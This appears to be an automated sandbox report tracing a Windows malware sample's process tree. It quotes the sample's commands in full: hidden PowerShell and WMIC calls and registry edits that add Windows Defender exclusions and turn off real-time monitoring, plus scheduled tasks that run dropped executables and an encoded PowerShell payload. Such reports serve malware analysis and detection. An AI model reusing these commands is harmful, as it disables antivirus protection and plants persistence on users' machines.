Token: SeShutdownPrivilege 2076 WMIC.exe Token: SeSystemEnvironmentPrivilege 2076 WMIC.exe Token: SeUndockPrivilege 2076 WMIC.exe Token: SeManageVolumePrivilege 2076 WMIC.exe Token: SeDebugPrivilege 1568 powershell.EXE Token: SeDebugPrivilege 1316 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2992 WMIC.exe Token: SeIncreaseQuotaPrivilege 2992 WMIC.exe Token: SeSecurityPrivilege 2992 WMIC.exe Token: SeTakeOwnershipPrivilege 2992 WMIC.exe Token: SeLoadDriverPrivilege 2992 WMIC.exe Token: SeSystemtimePrivilege 2992 WMIC.exe Token: SeBackupPrivilege 2992 WMIC.exe Token: SeRestorePrivilege 2992 WMIC.exe Token: SeShutdownPrivilege 2992 WMIC.exe Token: SeSystemEnvironmentPrivilege 2992 WMIC.exe Token: SeUndockPrivilege 2992 WMIC.exe Token: SeManageVolumePrivilege 2992 WMIC.exe Token: SeDebugPrivilege 2128 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2216 WMIC.exe Token: SeIncreaseQuotaPrivilege 2216 WMIC.exe Token: SeSecurityPrivilege 2216 WMIC.exe Token: SeTakeOwnershipPrivilege 2216 WMIC.exe Token: SeLoadDriverPrivilege 2216 WMIC.exe Token: SeSystemtimePrivilege 2216 WMIC.exe Token: SeBackupPrivilege 2216 WMIC.exe Token: SeRestorePrivilege 2216 WMIC.exe Token: SeShutdownPrivilege 2216 WMIC.exe Token: SeSystemEnvironmentPrivilege 2216 WMIC.exe Token: SeUndockPrivilege 2216 WMIC.exe Token: SeManageVolumePrivilege 2216 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1732 wrote to memory of 3044 1732 c877d6d5e56cc8a52c34c49203322d0c33a95c2dd9fb558f1a069a1b841117ff.exe 30 PID 1732 wrote to memory of 3044 1732 c877d6d5e56cc8a52c34c49203322d0c33a95c2dd9fb558f1a069a1b841117ff.exe 30 PID 1732 wrote to memory of 3044 1732 c877d6d5e56cc8a52c34c49203322d0c33a95c2dd9fb558f1a069a1b841117ff.exe 30 PID 1732 wrote to memory of 3044 1732 c877d6d5e56cc8a52c34c49203322d0c33a95c2dd9fb558f1a069a1b841117ff.exe 30 PID 1732 wrote to memory of 3044 1732 c877d6d5e56cc8a52c34c49203322d0c33a95c2dd9fb558f1a069a1b841117ff.exe 30 PID 1732 wrote to memory of 3044 1732 c877d6d5e56cc8a52c34c49203322d0c33a95c2dd9fb558f1a069a1b841117ff.exe 30 PID 1732 wrote to memory of 3044 1732 c877d6d5e56cc8a52c34c49203322d0c33a95c2dd9fb558f1a069a1b841117ff.exe 30 PID 3044 wrote to memory of 2764 3044 Install.exe 31 PID 3044 wrote to memory of 2764 3044 Install.exe 31 PID 3044 wrote to memory of 2764 3044 Install.exe 31 PID 3044 wrote to memory of 2764 3044 Install.exe 31 PID 3044 wrote to memory of 2764 3044 Install.exe 31 PID 3044 wrote to memory of 2764 3044 Install.exe 31 PID 3044 wrote to memory of 2764 3044 Install.exe 31 PID 2764 wrote to memory of 1760 2764 Install.exe 33 PID 2764 wrote to memory of 1760 2764 Install.exe 33 PID 2764 wrote to memory of 1760 2764 Install.exe 33 PID 2764 wrote to memory of 1760 2764 Install.exe 33 PID 2764 wrote to memory of 1760 2764 Install.exe 33 PID 2764 wrote to memory of 1760 2764 Install.exe 33 PID 2764 wrote to memory of 1760 2764 Install.exe 33 PID 1760 wrote to memory of 2748 1760 forfiles.exe 35 PID 1760 wrote to memory of 2748 1760 forfiles.exe 35 PID 1760 wrote to memory of 2748 1760 forfiles.exe 35 PID 1760 wrote to memory of 2748 1760 forfiles.exe 35 PID 1760 wrote to memory of 2748 1760 forfiles.exe 35 PID 1760 wrote to memory of 2748 1760 forfiles.exe 35 PID 1760 wrote to memory of 2748 1760 forfiles.exe 35 PID 2748 wrote to memory of 2688 2748 cmd.exe 36 PID 2748 wrote to memory of 2688 2748 cmd.exe 36 PID 2748 wrote to memory of 2688 2748 cmd.exe 36 PID 2748 wrote to memory of 2688 2748 cmd.exe 36 PID 2748 wrote to memory of 2688 2748 cmd.exe 36 PID 2748 wrote to memory of 2688 2748 cmd.exe 36 PID 2748 wrote to memory of 2688 2748 cmd.exe 36 PID 2688 wrote to memory of 2684 2688 powershell.exe 37 PID 2688 wrote to memory of 2684 2688 powershell.exe 37 PID 2688 wrote to memory of 2684 2688 powershell.exe 37 PID 2688 wrote to memory of 2684 2688 powershell.exe 37 PID 2688 wrote to memory of 2684 2688 powershell.exe 37 PID 2688 wrote to memory of 2684 2688 powershell.exe 37 PID 2688 wrote to memory of 2684 2688 powershell.exe 37 PID 2764 wrote to memory of 2448 2764 Install.exe 38 PID 2764 wrote to memory of 2448 2764 Install.exe 38 PID 2764 wrote to memory of 2448 2764 Install.exe 38 PID 2764 wrote to memory of 2448 2764 Install.exe 38 PID 2764 wrote to memory of 2448 2764 Install.exe 38 PID 2764 wrote to memory of 2448 2764 Install.exe 38 PID 2764 wrote to memory of 2448 2764 Install.exe 38 PID 2816 wrote to memory of 324 2816 taskeng.exe 41 PID 2816 wrote to memory of 324 2816 taskeng.exe 41 PID 2816 wrote to memory of 324 2816 taskeng.exe 41 PID 2816 wrote to memory of 324 2816 taskeng.exe 41 PID 324 wrote to memory of 332 324 adRNGBp.exe 42 PID 324 wrote to memory of 332 324 adRNGBp.exe 42 PID 324 wrote to memory of 332 324 adRNGBp.exe 42 PID 324 wrote to memory of 332 324 adRNGBp.exe 42 PID 324 wrote to memory of 1364 324 adRNGBp.exe 44 PID 324 wrote to memory of 1364 324 adRNGBp.exe 44 PID 324 wrote to memory of 1364 324 adRNGBp.exe 44 PID 324 wrote to memory of 1364 324 adRNGBp.exe 44 PID 2936 wrote to memory of 292 2936 taskeng.exe 47 PID 2936 wrote to memory of 292 2936 taskeng.exe 47 PID 2936 wrote to memory of 292 2936 taskeng.exe 47
Processes
-
C:\Users\Admin\AppData\Local\Temp\c877d6d5e56cc8a52c34c49203322d0c33a95c2dd9fb558f1a069a1b841117ff.exe"C:\Users\Admin\AppData\Local\Temp\c877d6d5e56cc8a52c34c49203322d0c33a95c2dd9fb558f1a069a1b841117ff.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Users\Admin\AppData\Local\Temp\7zSE476.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Users\Admin\AppData\Local\Temp\7zSEB68.tmp\Install.exe.\Install.exe /bRdOdidrvWct "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2684
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bMfeDuSmKBAGoOfQBS" /SC once /ST 22:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\XzCRxLAMjkWVuGGMb\wRfbUVGhINQtrUq\adRNGBp.exe\" NI /HPAdidNRyL 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2448
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 5204⤵
- Loads dropped DLL
- Program crash
PID:2148
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {66360C03-AC2F-4E1E-80B4-103026CD348D} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Users\Admin\AppData\Local\Temp\XzCRxLAMjkWVuGGMb\wRfbUVGhINQtrUq\adRNGBp.exeC:\Users\Admin\AppData\Local\Temp\XzCRxLAMjkWVuGGMb\wRfbUVGhINQtrUq\adRNGBp.exe NI /HPAdidNRyL 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:324 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gnuUUfYBm" /SC once /ST 06:49:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:332
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gnuUUfYBm"3⤵PID:1364
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gnuUUfYBm"3⤵PID:2260
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:2256
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1940
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:2024
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1784
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gpeCEmdsM" /SC once /ST 14:45:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:1048
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gpeCEmdsM"3⤵PID:2524
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gpeCEmdsM"3⤵PID:2340
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵PID:2388
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:692
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2496 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2076
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WIjQsZOhtuiKSoXd" /t REG_DWORD /d 0 /reg:323⤵PID:2480
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WIjQsZOhtuiKSoXd" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:624
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WIjQsZOhtuiKSoXd" /t REG_DWORD /d 0 /reg:643⤵PID:2916
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WIjQsZOhtuiKSoXd" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1124
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WIjQsZOhtuiKSoXd" /t REG_DWORD /d 0 /reg:323⤵PID:908
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WIjQsZOhtuiKSoXd" /t REG_DWORD /d 0 /reg:324⤵PID:2820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WIjQsZOhtuiKSoXd" /t REG_DWORD /d 0 /reg:643⤵PID:2300
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WIjQsZOhtuiKSoXd" /t REG_DWORD /d 0 /reg:644⤵PID:2868
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\WIjQsZOhtuiKSoXd\hzLlsoPy\YwCVDwWcehtqfhwo.wsf"3⤵PID:2832
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\WIjQsZOhtuiKSoXd\hzLlsoPy\YwCVDwWcehtqfhwo.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2788 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GtOnFDWCCgUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GtOnFDWCCgUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KDENuaOqQISU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KDENuaOqQISU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LAYqAmppRtojC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:3060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LAYqAmppRtojC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2292
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\itCXZnYssICbfHKCXDR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2108
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\itCXZnYssICbfHKCXDR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2508
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rZPMEzngU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rZPMEzngU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2096
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\XKbpoCnULTQzsVVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1244
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\XKbpoCnULTQzsVVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:3000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\XzCRxLAMjkWVuGGMb" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\XzCRxLAMjkWVuGGMb" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WIjQsZOhtuiKSoXd" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2452
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WIjQsZOhtuiKSoXd" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GtOnFDWCCgUn" /t REG_DWORD /d 0 /reg:324⤵PID:2460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GtOnFDWCCgUn" /t REG_DWORD /d 0 /reg:644⤵PID:2136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KDENuaOqQISU2" /t REG_DWORD /d 0 /reg:324⤵PID:1196
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KDENuaOqQISU2" /t REG_DWORD /d 0 /reg:644⤵PID:2124
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LAYqAmppRtojC" /t REG_DWORD /d 0 /reg:324⤵PID:1784
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LAYqAmppRtojC" /t REG_DWORD /d 0 /reg:644⤵PID:2008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\itCXZnYssICbfHKCXDR" /t REG_DWORD /d 0 /reg:324⤵PID:1048
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\itCXZnYssICbfHKCXDR" /t REG_DWORD /d 0 /reg:644⤵PID:2524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rZPMEzngU" /t REG_DWORD /d 0 /reg:324⤵PID:520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rZPMEzngU" /t REG_DWORD /d 0 /reg:644⤵PID:1548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\XKbpoCnULTQzsVVB" /t REG_DWORD /d 0 /reg:324⤵PID:2560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\XKbpoCnULTQzsVVB" /t REG_DWORD /d 0 /reg:644⤵PID:2236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:2724
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:1100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\XzCRxLAMjkWVuGGMb" /t REG_DWORD /d 0 /reg:324⤵PID:1068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\XzCRxLAMjkWVuGGMb" /t REG_DWORD /d 0 /reg:644⤵PID:776
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WIjQsZOhtuiKSoXd" /t REG_DWORD /d 0 /reg:324⤵PID:1680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WIjQsZOhtuiKSoXd" /t REG_DWORD /d 0 /reg:644⤵PID:1576
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gjLsGzMLf" /SC once /ST 17:39:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:2772
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gjLsGzMLf"3⤵PID:1480
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gjLsGzMLf"3⤵PID:1600
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:2808
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:3052
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:2628
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:2160
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NEaCSBqXysBCPlvqA" /SC once /ST 17:38:25 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WIjQsZOhtuiKSoXd\QBJFAnahrWxXzYu\ffeQVgT.exe\" d4 /AcUBdidzo 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1528
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "NEaCSBqXysBCPlvqA"3⤵PID:2632
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 324 -s 4883⤵
- Loads dropped DLL
- Program crash
PID:2664
-
-
-
C:\Windows\Temp\WIjQsZOhtuiKSoXd\QBJFAnahrWxXzYu\ffeQVgT.exeC:\Windows\Temp\WIjQsZOhtuiKSoXd\QBJFAnahrWxXzYu\ffeQVgT.exe d4 /AcUBdidzo 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1564 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bMfeDuSmKBAGoOfQBS"3⤵PID:1264
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵PID:964
-
